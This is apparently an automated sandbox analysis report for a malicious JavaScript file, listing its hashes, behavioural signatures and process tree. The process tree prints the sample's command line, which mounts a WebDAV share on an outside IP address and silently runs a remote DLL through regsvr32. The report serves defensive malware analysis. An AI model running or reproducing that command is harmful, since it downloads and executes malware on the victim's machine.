Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
140s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
21/07/2024, 18:22
Static task
static1
Behavioral task
behavioral1
Sample
73617223024615269.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
73617223024615269.js
Resource
win10v2004-20240709-en
General
-
Target
73617223024615269.js
-
Size
4KB
-
MD5
7c5da1c34d34594f68a5e5519cc94e43
-
SHA1
1d137056cbd41b778e3d08df65907bc6f7dd443c
-
SHA256
79f1e4f71bb53f86f422baa1a6173a43607c79d1aad750612ab271660cbdbbc4
-
SHA512
1fbefa7052f751686575fcc4291f622055e1d70f1ad9c4f877d8677efa7d019c366776b11d9345f09b374cf02b8ce2505a2b4a9d88cdb4bd020fb36b11782e21
-
SSDEEP
48:k7mEWr6UTpZk4E27CIVLWTEWYVEWxK7mqEWTtufEWyfEWy3fmqEWfBoPSQUvEWAn:k79UTpjx7P9utRtiaeU3Ak47U9CeU3J8
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1508 wrote to memory of 1196 1508 wscript.exe 86 PID 1508 wrote to memory of 1196 1508 wscript.exe 86 PID 1196 wrote to memory of 1836 1196 cmd.exe 88 PID 1196 wrote to memory of 1836 1196 cmd.exe 88
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\73617223024615269.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\30996305923783.dll2⤵
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:1836
-
-